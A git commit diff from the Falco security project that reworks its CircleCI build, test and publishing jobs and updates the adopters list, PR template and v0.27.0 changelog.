chore: comment out again rules validation for now

Signed-off-by: Lorenzo Fontana <lo@linux.com>
update(userspace/libhawk): further explaination for rules provider
2026-03-20 11:42:06 +00:00 · 2021-01-21 10:50:47 +01:00 · 2021-01-21 10:49:52 +01:00 · 2021-01-21 10:49:52 +01:00 · 2021-01-21 10:49:52 +01:00 · 2021-01-21 10:49:52 +01:00
286 changed files with 10014 additions and 7315 deletions
--- a/.circleci/OWNERS
+++ b/.circleci/OWNERS
@@ -0,0 +1,4 @@
+approvers:
+  - jonahjon
+reviewers:
+  - jonahjon
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,7 +1,151 @@
 version: 2
 jobs:
+  # Build a statically linked Falco release binary using musl
+  # This build is 100% static, there are no host dependencies
+  "build/musl":
+    docker:
+      - image: alpine:3.12
+    steps:
+      - checkout:
+          path: /source-static/falco
+      - run:
+          name: Update base image
+          command: apk update
+      - run:
+          name: Install build dependencies
+          command: apk add g++ gcc cmake cmake make ncurses-dev git bash perl linux-headers autoconf automake m4 libtool elfutils-dev libelf-static patch binutils
+      - run:
+          name: Prepare project
+          command: |
+            mkdir -p /build-static/release
+            cd /build-static/release
+            cmake -DCPACK_GENERATOR=TGZ -DBUILD_BPF=Off -DBUILD_DRIVER=Off -DCMAKE_BUILD_TYPE=Release -DUSE_BUNDLED_DEPS=On -DMUSL_OPTIMIZED_BUILD=On -DFALCO_ETC_DIR=/etc/falco /source-static/falco
+      - run:
+          name: Build
+          command: |
+            cd /build-static/release
+            make -j4 all
+      - run:
+          name: Package
+          command: |
+            cd /build-static/release
+            make -j4 package
+      - run:
+          name: Run unit tests
+          command: |
+            cd /build-static/release
+            make tests
+      - run:
+          name: Prepare artifacts
+          command: |
+            mkdir -p /tmp/packages
+            cp /build-static/release/*.tar.gz /tmp/packages
+      - store_artifacts:
+          path: /tmp/packages
+          destination: /packages
+      - persist_to_workspace:
+          root: /
+          paths:
+            - build-static/release
+            - source-static
+  # Build the minimal Falco
+  # This build only contains the Falco engine and the basic input/output.
+  "build/minimal":
+    docker:
+      - image: ubuntu:focal
+    steps:
+      - checkout
+      - run:
+          name: Update base image
+          command: apt update -y
+      - run:
+          name: Install dependencies
+          command: DEBIAN_FRONTEND=noninteractive apt install libjq-dev libncurses-dev libyaml-cpp-dev libelf-dev cmake build-essential git -y
+      - run:
+          name: Prepare project
+          command: |
+            mkdir build-minimal
+            pushd build-minimal
+            cmake -DMINIMAL_BUILD=On -DBUILD_BPF=Off -DBUILD_DRIVER=Off -DCMAKE_BUILD_TYPE=Release ..
+            popd
+      - run:
+          name: Build
+          command: |
+            pushd build-minimal
+            make -j4 all
+            popd
+      - run:
+          name: Run unit tests
+          command: |
+            pushd build-minimal
+            make tests
+            popd
  # Build using ubuntu LTS
  # This build is dynamic, most dependencies are taken from the OS
+  "build/ubuntu-focal":
+    docker:
+      - image: ubuntu:focal
+    steps:
+      - checkout
+      - run:
+          name: Update base image
+          command: apt update -y
+      - run:
+          name: Install dependencies
+          command: DEBIAN_FRONTEND=noninteractive apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm libelf-dev cmake build-essential libcurl4-openssl-dev linux-headers-generic clang llvm git -y
+      - run:
+          name: Prepare project
+          command: |
+            mkdir build
+            pushd build
+            cmake -DBUILD_BPF=On ..
+            popd
+      - run:
+          name: Build
+          command: |
+            pushd build
+            KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
+            popd
+      - run:
+          name: Run unit tests
+          command: |
+            pushd build
+            make tests
+            popd
+  # Debug build using ubuntu LTS
+  # This build is dynamic, most dependencies are taken from the OS
+  "build/ubuntu-focal-debug":
+    docker:
+      - image: ubuntu:focal
+    steps:
+      - checkout
+      - run:
+          name: Update base image
+          command: apt update -y
+      - run:
+          name: Install dependencies
+          command: DEBIAN_FRONTEND=noninteractive apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm libelf-dev cmake build-essential libcurl4-openssl-dev linux-headers-generic clang llvm git -y
+      - run:
+          name: Prepare project
+          command: |
+            mkdir build
+            pushd build
+            cmake -DCMAKE_BUILD_TYPE=debug -DBUILD_BPF=On ..
+            popd
+      - run:
+          name: Build
+          command: |
+            pushd build
+            KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
+            popd
+      - run:
+          name: Run unit tests
+          command: |
+            pushd build
+            make tests
+            popd
+  # Build using Ubuntu Bionic Beaver (18.04)
+  # This build is static, dependencies are bundled in the Falco binary
  "build/ubuntu-bionic":
    docker:
      - image: ubuntu:bionic
@@ -12,19 +156,19 @@ jobs:
          command: apt update -y
      - run:
          name: Install dependencies
-          command: apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm linux-headers-$(uname -r) libelf-dev cmake build-essential libcurl4-openssl-dev -y
+          command: DEBIAN_FRONTEND=noninteractive apt install cmake build-essential clang llvm git linux-headers-generic libncurses-dev pkg-config autoconf libtool libelf-dev -y
      - run:
          name: Prepare project
          command: |
            mkdir build
            pushd build
-            cmake ..
+            cmake -DBUILD_BPF=On -DUSE_BUNDLED_DEPS=On ..
            popd
      - run:
          name: Build
          command: |
            pushd build
-            make -j4 all
+            KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
            popd
      - run:
          name: Run unit tests
@@ -32,31 +176,31 @@ jobs:
            pushd build
            make tests
            popd
-  # Debug build using ubuntu LTS
-  # This build is dynamic, most dependencies are taken from the OS
-  "build/ubuntu-bionic-debug":
+  # Build using CentOS 8
+  # This build is static, dependencies are bundled in the Falco binary
+  "build/centos8":
    docker:
-      - image: ubuntu:bionic
+      - image: centos:8
    steps:
      - checkout
      - run:
          name: Update base image
-          command: apt update -y
+          command: dnf update -y
      - run:
          name: Install dependencies
-          command: apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm linux-headers-$(uname -r) libelf-dev cmake build-essential libcurl4-openssl-dev -y
+          command: dnf install gcc gcc-c++ git make cmake autoconf automake pkg-config patch ncurses-devel libtool elfutils-libelf-devel diffutils kernel-devel kernel-headers kernel-core clang llvm which -y
      - run:
          name: Prepare project
          command: |
            mkdir build
            pushd build
-            cmake -DCMAKE_BUILD_TYPE=debug ..
+            cmake -DBUILD_BPF=On -DUSE_BUNDLED_DEPS=On ..
            popd
      - run:
          name: Build
          command: |
            pushd build
-            make -j4 all
+            KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
            popd
      - run:
          name: Run unit tests
@@ -65,7 +209,7 @@ jobs:
            make tests
            popd
  # Build using our own builder base image using centos 7
-  # This build is static, dependencies are bundled in the falco binary
+  # This build is static, dependencies are bundled in the Falco binary
  "build/centos7":
    docker:
      - image: falcosecurity/falco-builder:latest
@@ -102,7 +246,7 @@ jobs:
          path: /tmp/packages
          destination: /packages
  # Debug build using our own builder base image using centos 7
-  # This build is static, dependencies are bundled in the falco binary
+  # This build is static, dependencies are bundled in the Falco binary
  "build/centos7-debug":
    docker:
      - image: falcosecurity/falco-builder:latest
@@ -138,6 +282,61 @@ jobs:
      - run:
          name: Execute integration tests
          command: /usr/bin/entrypoint test
+      - store_test_results:
+          path: /build/release/integration-tests-xunit
+  "tests/integration-static":
+    docker:
+      - image: falcosecurity/falco-tester:latest
+        environment:
+          SOURCE_DIR: "/source-static"
+          BUILD_DIR: "/build-static"
+          BUILD_TYPE: "release"
+          SKIP_PACKAGES_TESTS: "true"
+    steps:
+      - setup_remote_docker
+      - attach_workspace:
+          at: /
+      - run:
+          name: Execute integration tests
+          command: /usr/bin/entrypoint test
+      - store_test_results:
+          path: /build-static/release/integration-tests-xunit
+  "tests/driver-loader/integration":
+    machine:
+      image: ubuntu-1604:202004-01
+    steps:
+      - attach_workspace:
+          at: /tmp/ws
+      - run:
+          name: Execute driver-loader integration tests
+          command: /tmp/ws/source/falco/test/driver-loader/run_test.sh /tmp/ws/build/release/
+  # Code quality
+  "quality/static-analysis":
+    docker:
+      - image: falcosecurity/falco-builder:latest
+        environment:
+          BUILD_TYPE: "release"
+    steps:
+      - run:
+          name: Install cppcheck
+          command: |
+            yum update -y
+            yum install epel-release -y
+            yum install cppcheck cppcheck-htmlreport -y
+      - checkout:
+          path: /source/falco
+      - run:
+          name: Prepare project
+          command: /usr/bin/entrypoint cmake
+      - run:
+          name: cppcheck
+          command: /usr/bin/entrypoint cppcheck
+      - run:
+          name: cppcheck html report
+          command: /usr/bin/entrypoint cppcheck_htmlreport
+      - store_artifacts:
+          path: /build/release/static-analysis-reports
+          destination: /static-analysis-reports
  # Sign rpm packages
  "rpm/sign":
    docker:
@@ -194,10 +393,34 @@ jobs:
            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
      - run:
-          name: Publish tgz-dev
+          name: Publish bin-dev
          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin-dev/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
+            FALCO_VERSION=$(cat /build-static/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build-static/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin-dev/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
+  # Clenup the Falco development release packages
+  "cleanup/packages-dev":
+    docker:
+      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
+    steps:
+      - checkout:
+          path: /source/falco
+      - run:
+          name: Prepare env
+          command: |
+            apk add --no-cache --update
+            apk add curl jq
+      - run:
+          name: Only keep the 10 most recent Falco development release tarballs
+          command: |
+            /source/falco/scripts/cleanup -p ${BINTRAY_SECRET} -r bin-dev
+      - run:
+          name: Only keep the 50 most recent Falco development release RPMs
+          command: |
+            /source/falco/scripts/cleanup -p ${BINTRAY_SECRET} -r rpm-dev
+      - run:
+          name: Only keep the 50 most recent Falco development release DEBs
+          command: |
+            /source/falco/scripts/cleanup -p ${BINTRAY_SECRET} -r deb-dev
  # Publish docker packages
  "publish/docker-dev":
    docker:
@@ -208,26 +431,46 @@ jobs:
      - checkout
      - setup_remote_docker
      - run:
-          name: Build and publish slim-dev
+          name: Build and publish no-driver-dev
          command: |
            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-slim docker/slim
+            docker build --build-arg VERSION_BUCKET=bin-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco-no-driver:master docker/no-driver
+            docker tag falcosecurity/falco-no-driver:master falcosecurity/falco:master-slim
            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push falcosecurity/falco-no-driver:master
            docker push falcosecurity/falco:master-slim
-      - run:
-          name: Build and publish minimal-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=bin-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-minimal docker/minimal
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco:master-minimal
      - run:
          name: Build and publish dev
          command: |
            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/stable
+            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/falco
            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
            docker push falcosecurity/falco:master
+      - run:
+          name: Build and publish dev falco-driver-loader-dev
+          command: |
+            docker build --build-arg FALCO_IMAGE_TAG=master -t falcosecurity/falco-driver-loader:master docker/driver-loader
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push falcosecurity/falco-driver-loader:master
+  # Publish container images to AWS ECR Public
+  "publish/container-images-aws-dev":
+    docker:
+      - image: docker:stable
+    steps:
+      - attach_workspace:
+          at: /
+      - checkout
+      - setup_remote_docker
+      - run:
+          name: Build and publish falco to AWS
+          command: |
+            apk update
+            apk add --update groff less py-pip
+            pip install awscli
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t "public.ecr.aws/falcosecurity/falco:master" docker/falco
+            aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/falcosecurity
+            docker push "public.ecr.aws/falcosecurity/falco:master"
  # Publish the packages
  "publish/packages":
    docker:
@@ -253,10 +496,10 @@ jobs:
            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
      - run:
-          name: Publish tgz
+          name: Publish bin
          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
+            FALCO_VERSION=$(cat /build-static/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build-static/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
  # Publish docker packages
  "publish/docker":
    docker:
@@ -267,41 +510,74 @@ jobs:
      - checkout
      - setup_remote_docker
      - run:
-          name: Build and publish slim
+          name: Build and publish no-driver
          command: |
-            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}-slim" docker/slim
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}-slim" falcosecurity/falco:latest-slim
+            docker build --build-arg VERSION_BUCKET=bin --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco-no-driver:${CIRCLE_TAG}" docker/no-driver
+            docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" falcosecurity/falco-no-driver:latest
+            docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" "falcosecurity/falco:${CIRCLE_TAG}-slim"
+            docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" "falcosecurity/falco:latest-slim"
            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push "falcosecurity/falco-no-driver:${CIRCLE_TAG}"
+            docker push "falcosecurity/falco-no-driver:latest"
            docker push "falcosecurity/falco:${CIRCLE_TAG}-slim"
            docker push "falcosecurity/falco:latest-slim"
      - run:
-          name: Build and publish minimal
+          name: Build and publish falco
          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=bin --build-arg FALCO_VERSION=${FALCO_VERSION} -t "falcosecurity/falco:${CIRCLE_TAG}-minimal" docker/minimal
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}-minimal" falcosecurity/falco:latest-minimal
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco:${CIRCLE_TAG}-minimal"
-            docker push "falcosecurity/falco:latest-minimal"
-      - run:
-          name: Build and publish stable
-          command: |
-            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/stable
+            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/falco
            docker tag "falcosecurity/falco:${CIRCLE_TAG}" falcosecurity/falco:latest
            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
            docker push "falcosecurity/falco:${CIRCLE_TAG}"
            docker push "falcosecurity/falco:latest"
+      - run:
+          name: Build and publish falco-driver-loader
+          command: |
+            docker build --build-arg FALCO_IMAGE_TAG=${CIRCLE_TAG} -t "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" docker/driver-loader
+            docker tag "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" falcosecurity/falco-driver-loader:latest
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push "falcosecurity/falco-driver-loader:${CIRCLE_TAG}"
+            docker push "falcosecurity/falco-driver-loader:latest"
+  # Publish container images to AWS ECR Public
+  "publish/container-images-aws":
+    docker:
+      - image: docker:stable
+    steps:
+      - attach_workspace:
+          at: /
+      - checkout
+      - setup_remote_docker
+      - run:
+          name: Build and publish falco to AWS
+          command: |
+            apk update
+            apk add --update groff less py-pip
+            pip install awscli
+            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "public.ecr.aws/falcosecurity/falco:${CIRCLE_TAG}" docker/falco
+            docker tag "public.ecr.aws/falcosecurity/falco:${CIRCLE_TAG}" public.ecr.aws/falcosecurity/falco:latest
+            aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/falcosecurity
+            docker push "public.ecr.aws/falcosecurity/falco:${CIRCLE_TAG}"
+            docker push "public.ecr.aws/falcosecurity/falco:latest"
 workflows:
  version: 2
  build_and_test:
    jobs:
+      - "build/musl"
+      - "build/minimal"
+      - "build/ubuntu-focal"
+      - "build/ubuntu-focal-debug"
      - "build/ubuntu-bionic"
-      - "build/ubuntu-bionic-debug"
+      - "build/centos8"
      - "build/centos7"
      - "build/centos7-debug"
      - "tests/integration":
          requires:
            - "build/centos7"
+      - "tests/integration-static":
+          requires:
+            - "build/musl"
+      - "tests/driver-loader/integration":
+          requires:
+            - "build/centos7"
      - "rpm/sign":
          context: falco
          filters:
@@ -320,6 +596,16 @@ workflows:
              only: master
          requires:
            - "rpm/sign"
+            - "tests/integration-static"
+      - "cleanup/packages-dev":
+          context: falco
+          filters:
+            tags:
+              ignore: /.*/
+            branches:
+              only: master
+          requires:
+            - "publish/packages-dev"
      - "publish/docker-dev":
          context: falco
          filters:
@@ -329,8 +615,25 @@ workflows:
              only: master
          requires:
            - "publish/packages-dev"
+            - "tests/driver-loader/integration"
+      - "publish/container-images-aws-dev":
+          context: test-infra # contains Falco AWS credentials
+          filters:
+            tags:
+              ignore: /.*/
+            branches:
+              only: master
+          requires:
+            - publish/docker-dev
+      # - "quality/static-analysis" # This is temporarly disabled: https://github.com/falcosecurity/falco/issues/1526
  release:
    jobs:
+      - "build/musl":
+          filters:
+            tags:
+              only: /.*/
+            branches:
+              ignore: /.*/
      - "build/centos7":
          filters:
            tags:
@@ -349,6 +652,7 @@ workflows:
      - "publish/packages":
          context: falco
          requires:
+            - "build/musl"
            - "rpm/sign"
          filters:
            tags:
@@ -364,3 +668,12 @@ workflows:
              only: /.*/
            branches:
              ignore: /.*/
+      - "publish/container-images-aws":
+          context: test-infra # contains Falco AWS credentials
+          requires:
+            - "publish/docker"
+          filters:
+            tags:
+              only: /.*/
+            branches:
+              ignore: /.*/
--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -40,12 +40,8 @@ Please remove the leading whitespace before the `/kind <>` you uncommented.

 > /area engine

-> /area examples
-
 > /area rules

-> /area integrations
-
 > /area tests

 > /area proposals
--- a/.github/stale.yml
+++ b/.github/stale.yml
@@ -1,19 +0,0 @@
-# Number of days of inactivity before an issue becomes stale
-daysUntilStale: 60
-# Number of days of inactivity before a stale issue is closed
-daysUntilClose: 7
-# Issues with these labels will never be considered stale
-exemptLabels:
-  - cncf
-  - roadmap
-  - enhancement
-  - "help wanted"
-# Label to use when marking an issue as stale
-staleLabel: wontfix
-# Comment to post when marking an issue as stale. Set to `false` to disable
-markComment: >
-  This issue has been automatically marked as stale because it has not had
-  recent activity. It will be closed if no further activity occurs. Thank you
-  for your contributions.
-# Comment to post when closing a stale issue. Set to `false` to disable
-closeComment: false
--- a/.gitignore
+++ b/.gitignore
@@ -2,7 +2,6 @@
 *~
 *.pyc

-test/falco_tests.yaml
 test/traces-negative
 test/traces-positive
 test/traces-info
@@ -11,17 +10,9 @@ test/.phoronix-test-suite
 test/results*.json.*
 test/build

-userspace/falco/lua/re.lua
-userspace/falco/lua/lpeg.so
 userspace/engine/lua/lyaml
 userspace/engine/lua/lyaml.lua

-docker/event-generator/event_generator
-docker/event-generator/mysqld
-docker/event-generator/httpd
-docker/event-generator/sha1sum
-docker/event-generator/vipw
-
 .vscode/*

 .luacheckcache
--- a/.luacheckrc
+++ b/.luacheckrc
@@ -1,7 +1,6 @@
 std = "min"
 cache = true
 include_files = {
-    "userspace/falco/lua/*.lua",
    "userspace/engine/lua/*.lua",
    "userspace/engine/lua/lyaml/*.lua",
    "*.luacheckrc"
--- a/ADOPTERS.md
+++ b/ADOPTERS.md
@@ -8,7 +8,12 @@ This is a list of production adopters of Falco (in alphabetical order):

 * [Frame.io](https://frame.io/) - Frame.io is a cloud-based (SaaS) video review and collaboration platform that enables users to securely upload source media, work-in-progress edits, dailies, and more into private workspaces where they can invite their team and clients to collaborate on projects. Understanding what is running on production servers, and the context around why things are running is even more tricky now that we have further abstractions like Docker and Kubernetes. To get this needed visibility into our system, we rely on Falco. Falco's ability to collect raw system calls such as open, connect, exec, along with their arguments offer key insights on what is happening on the production system and became the foundation of our intrusion detection and alerting system.

-* [League](https://league.com/ca/) - League provides health benefits management services to help employees understand and get the most from their benefits, and employers to provide effective, efficient plans. Falco is used to monitor our deployed services on Kubernetes, protecting against malicious access to containerswhich could lead to leaks of PHI or other sensitive data. The Falco alerts are logged in Stackdriver for grouping and further analysis. In the future, we're hoping for integrations with Prometheus and AlertManager as well.
+* [GitLab](https://about.gitlab.com/direction/defend/container_host_security/) - GitLab is a complete DevOps platform, delivered as a single application, fundamentally changing the way Development, Security, and Ops teams collaborate. GitLab Ultimate provides the single tool teams need to find, triage, and fix vulnerabilities in applications, services, and cloud-native environments enabling them to manage their risk. This provides them with repeatable, defensible processes that automate security and compliance policies. GitLab includes a tight integration with Falco, allowing users to defend their containerized applications from attacks while running in production.
+
+* [League](https://league.com/ca/) - League provides health benefits management services to help employees understand and get the most from their benefits, and employers to provide effective, efficient plans. Falco is used to monitor our deployed services on Kubernetes, protecting against malicious access to containers which could lead to leaks of PHI or other sensitive data. The Falco alerts are logged in Stackdriver for grouping and further analysis. In the future, we're hoping for integrations with Prometheus and AlertManager as well.
+
+* [Logz.io](https://logz.io/) - Logz.io is a cloud observability platform for modern engineering teams. The Logz.io platform consists of three products — Log Management, Infrastructure Monitoring, and Cloud SIEM — that work together to unify the jobs of monitoring, troubleshooting, and security. We empower engineers to deliver better software by offering the world's most popular open source observability tools — the ELK Stack, Grafana, and Jaeger — in a single, easy to use, and powerful platform purpose-built for monitoring distributed cloud environments. Cloud SIEM supports data from multiple sources, including Falco's alerts, and offers useful rules and dashboards content to visualize and manage incidents across your systems in a unified UI.
+  * https://logz.io/blog/k8s-security-with-falco-and-cloud-siem/

 * [Preferral](https://www.preferral.com) - Preferral is a HIPAA-compliant platform for Referral Management and Online Referral Forms. Preferral streamlines the referral process for patients, specialists and their referral partners. By automating the referral process, referring practices spend less time on the phone, manual efforts are eliminated, and patients get the right care from the right specialist. Preferral leverages Falco to provide a Host Intrusion Detection System to meet their HIPPA compliance requirements.
  * https://hipaa.preferral.com/01-preferral_hipaa_compliance/
@@ -21,5 +26,5 @@ This is a list of production adopters of Falco (in alphabetical order):

 * [Sumo Logic](https://www.sumologic.com/) - Sumo Logic provides a SaaS based log aggregation service that provides dashboards and applications to easily identify and analyze problems in your application and infrastructure. Sumo Logic provides native integrations for many CNCF projects, such as Falco, that allows end users to easily collect Falco events and analyze Falco events on DecSecOps focused dashboards.

-*  [Sysdig](https://www.sysdig.com/) Sysdig originally created Falco in 2016 to detect unexpected or suspicious activity using a rules engine on top of the data that comes from the sysdig kernel system call probe. Sysdig provides tooling to help with vulnerability management, compliance, detection, incident response and forensics in Cloud-native environments. Sysdig Secure has extended falco to include: a rule library, the ability to update macros, lists & rules via the user interface and API, automated tuning of rules, and rule creation based on profiling known system behavior. On top of the basic Falco rules, Sysdig Secure implements the concept of a "Security policy" that can comprise several rules which are evaluated for a user-define infrastructure scope like Kubernetes namespaces, OpenShift clusters, deployment workload, cloud regions etc.
+*  [Sysdig](https://www.sysdig.com/) Sysdig originally created Falco in 2016 to detect unexpected or suspicious activity using a rules engine on top of the data that comes from the sysdig kernel system call probe. Sysdig provides tooling to help with vulnerability management, compliance, detection, incident response and forensics in Cloud-native environments. Sysdig Secure has extended Falco to include: a rule library, the ability to update macros, lists & rules via the user interface and API, automated tuning of rules, and rule creation based on profiling known system behavior. On top of the basic Falco rules, Sysdig Secure implements the concept of a "Security policy" that can comprise several rules which are evaluated for a user-defined infrastructure scope like Kubernetes namespaces, OpenShift clusters, deployment workload, cloud regions etc.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,10 +1,318 @@
 # Change Log

-This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
+## v0.27.0
+
+Released on 2021-01-18
+
+### Major Changes
+
+* new: Added falco engine version to grpc version service [[#1507](https://github.com/falcosecurity/falco/pull/1507)] - [@nibalizer](https://github.com/nibalizer)
+* BREAKING CHANGE: Users who run Falco without a config file will be unable to do that any more, Falco now expects a configuration file to be passed all the times. Developers may need to adjust their processes. [[#1494](https://github.com/falcosecurity/falco/pull/1494)] - [@nibalizer](https://github.com/nibalizer)
+* new: asynchronous outputs implementation, outputs channels will not block event processing anymore [[#1451](https://github.com/falcosecurity/falco/pull/1451)] - [@leogr](https://github.com/leogr)
+* new: slow outputs detection [[#1451](https://github.com/falcosecurity/falco/pull/1451)] - [@leogr](https://github.com/leogr)
+* new: `output_timeout` config option for slow outputs detection [[#1451](https://github.com/falcosecurity/falco/pull/1451)] - [@leogr](https://github.com/leogr)
+
+
+### Minor Changes
+
+* build: bump b64 to v2.0.0.1 [[#1441](https://github.com/falcosecurity/falco/pull/1441)] - [@fntlnz](https://github.com/fntlnz)
+* rules(macro container_started): re-use `spawned_process` macro inside `container_started` macro [[#1449](https://github.com/falcosecurity/falco/pull/1449)] - [@leodido](https://github.com/leodido)
+* docs: reach out documentation [[#1472](https://github.com/falcosecurity/falco/pull/1472)] - [@fntlnz](https://github.com/fntlnz)
+* docs: Broken outputs.proto link [[#1493](https://github.com/falcosecurity/falco/pull/1493)] - [@deepskyblue86](https://github.com/deepskyblue86)
+* docs(README.md): correct broken links [[#1506](https://github.com/falcosecurity/falco/pull/1506)] - [@leogr](https://github.com/leogr)
+* docs(proposals): Exceptions handling proposal [[#1376](https://github.com/falcosecurity/falco/pull/1376)] - [@mstemm](https://github.com/mstemm)
+* docs: fix a broken link of README [[#1516](https://github.com/falcosecurity/falco/pull/1516)] - [@oke-py](https://github.com/oke-py)
+* docs: adding the kubernetes privileged use case to use cases [[#1484](https://github.com/falcosecurity/falco/pull/1484)] - [@fntlnz](https://github.com/fntlnz)
+* rules(Mkdir binary dirs): Adds exe_running_docker_save as an exception as this rules can be triggerred when a container is created. [[#1386](https://github.com/falcosecurity/falco/pull/1386)] - [@jhwbarlow](https://github.com/jhwbarlow)
+* rules(Create Hidden Files): Adds exe_running_docker_save as an exception as this rules can be triggerred when a container is created. [[#1386](https://github.com/falcosecurity/falco/pull/1386)] - [@jhwbarlow](https://github.com/jhwbarlow)
+* docs(.circleci): welcome Jonah (Amazon) as a new Falco CI maintainer [[#1518](https://github.com/falcosecurity/falco/pull/1518)] - [@leodido](https://github.com/leodido)
